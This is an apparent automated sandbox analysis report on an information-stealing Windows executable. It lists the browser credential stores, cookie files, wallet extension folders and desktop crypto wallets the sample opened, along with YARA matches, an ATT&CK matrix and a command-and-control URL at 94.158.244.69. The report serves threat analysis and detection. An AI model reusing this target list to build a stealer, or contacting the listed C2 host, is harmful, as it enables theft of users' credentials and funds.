                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235270A mov eax, dword ptr fs:[00000030h]0_2_0235270A
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235474B mov eax, dword ptr fs:[00000030h]0_2_0235474B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234FC0B mov eax, dword ptr fs:[00000030h]0_2_0234FC0B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02356C4B mov eax, dword ptr fs:[00000030h]0_2_02356C4B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02356CA9 mov eax, dword ptr fs:[00000030h]0_2_02356CA9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235F4CC mov eax, dword ptr fs:[00000030h]0_2_0235F4CC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02356508 mov eax, dword ptr fs:[00000030h]0_2_02356508
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0237FD7C mov eax, dword ptr fs:[00000030h]0_2_0237FD7C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02330D90 mov eax, dword ptr fs:[00000030h]0_2_02330D90
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354D8B mov eax, dword ptr fs:[00000030h]0_2_02354D8B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236B5C9 mov eax, dword ptr fs:[00000030h]0_2_0236B5C9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,0_2_0043323B
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043D3A0
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043CE89 SetUnhandledExceptionFilter,0_2_0043CE89
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043CE95
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236D0F0 SetUnhandledExceptionFilter,0_2_0236D0F0
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236D0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0236D0FC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236D607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0236D607
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0237E5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0237E5A2
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0044614F
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00402476 GetComputerNameW,GetUserNameW,0_2_00402476
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00453BC4 GetTimeZoneInformation,0_2_00453BC4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.cgln32y2HF.exe.23a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cgln32y2HF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cgln32y2HF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.cgln32y2HF.exe.23a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2109855914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cgln32y2HF.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: cgln32y2HF.exeString found in binary or memory: %appdata%\Electrum\wallets
                    Source: cgln32y2HF.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: cgln32y2HF.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: cgln32y2HF.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance5t
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum[`a
                    Source: cgln32y2HF.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.0000000003151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: Process Memory Space: cgln32y2HF.exe PID: 7104, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.cgln32y2HF.exe.23a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cgln32y2HF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.cgln32y2HF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.cgln32y2HF.exe.23a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2109855914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cgln32y2HF.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    LSASS Driver
                    1
                    LSASS Driver
                    421
                    Virtualization/Sandbox Evasion
                    1
                    OS Credential Dumping
                    12
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory561
                    Security Software Discovery
                    Remote Desktop Protocol31
                    Data from Local System
                    1
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    Security Account Manager421
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Software Packing
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem113
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    cgln32y2HF.exe87%ReversingLabsWin32.Ransomware.LockBit
                    cgln32y2HF.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://94.158.244.69/c2sockJQ0%Avira URL Cloudsafe
                    http://94.158.244.69/c2socklQ0%Avira URL Cloudsafe
                    http://94.158.244.69/#0%Avira URL Cloudsafe
                    http://94.158.244.69/7?0%Avira URL Cloudsafe
                    http://94.158.244.69/c2socks0%Avira URL Cloudsafe
                    http://94.158.244.69/o0%Avira URL Cloudsafe
                    http://94.158.244.69/T0%Avira URL Cloudsafe
                    http://94.158.244.69:80/c2sock0%Avira URL Cloudsafe
                    http://94.158.244.69:80/c2sock~f0%Avira URL Cloudsafe
                    http://94.158.244.69/B0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock9Q0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://94.158.244.69/c2sockfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabcgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://94.158.244.69/#cgln32y2HF.exe, 00000000.00000002.4572489278.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://94.158.244.69/c2sockscgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icocgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://94.158.244.69/7?cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
